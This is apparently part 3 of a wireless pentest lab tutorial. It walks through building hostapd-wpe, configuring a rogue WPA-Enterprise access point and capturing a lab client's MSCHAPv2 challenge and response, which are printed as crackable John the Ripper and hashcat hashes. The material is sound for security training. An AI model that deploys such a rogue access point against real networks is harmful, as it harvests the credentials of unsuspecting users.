Wireless pentest lab Part 3

Part 1

Part 2

hostapd-wpe

Install the build dependencies

apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommends

Download, patch and build hostapd 2.10

wget https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/hostapd-2.10-wpe.patch
wget https://w1.fi/releases/hostapd-2.10.tar.gz
tar -zxf hostapd-2.10.tar.gz
cd hostapd-2.10
patch -p1 < ../hostapd-2.10-wpe.patch
cd hostapd
make
make install
make wpe

Creating certs

cd /etc/hostapd-wpe/certs
./bootstrap
make install

Copy and edit the hostapd-wpe config file

nano wpeattackap.conf

# Configuration file for hostapd-wpe

# Interface - Probably wlan0 for 802.11, eth0 for wired

interface=wlan3

# May have to change these depending on build location
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh

# 802.11 Options
ssid=OnDeMaNd-11
channel=1

Run hostapd-wpe with the new config file

└─$ sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf

[sudo] password for lab:
wlan3: interface state UNINITIALIZED->ENABLED
wlan3: AP-ENABLED
wlan3: INTERFACE-DISABLED
wlan3: INTERFACE-ENABLED

Verify that the SSID is available

Attempt to connect a client to the SSID

└─$ sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf

wlan3: interface state UNINITIALIZED->ENABLED
wlan3: AP-ENABLED
wlan3: INTERFACE-DISABLED
wlan3: INTERFACE-ENABLED
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.11: associated
wlan3: CTRL-EVENT-EAP-STARTED 66:dd:3d:13:e8:55
wlan3: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan3: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'


mschapv2: Mon Apr  3 19:02:05 2023
         username:      corp-exec
         challenge:     a3:a3:e1:0b:2c:6a:23:48
         response:      eb:ac:bf:00:0c:8a:5b:16:53:4d:0f:e4:48:1f:4b:59:06:f5:69:4c:ae:6a:54:3b
         jtr NETNTLM:           corp-exec:$NETNTLM$a3a3e10b2c6a2348$ebacbf000c8a5b16534d0fe4481f4b5906f5694cae6a543b
         hashcat NETNTLM:       corp-exec::::ebacbf000c8a5b16534d0fe4481f4b5906f5694cae6a543b:a3a3e10b2c6a2348

wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.11: disassociated
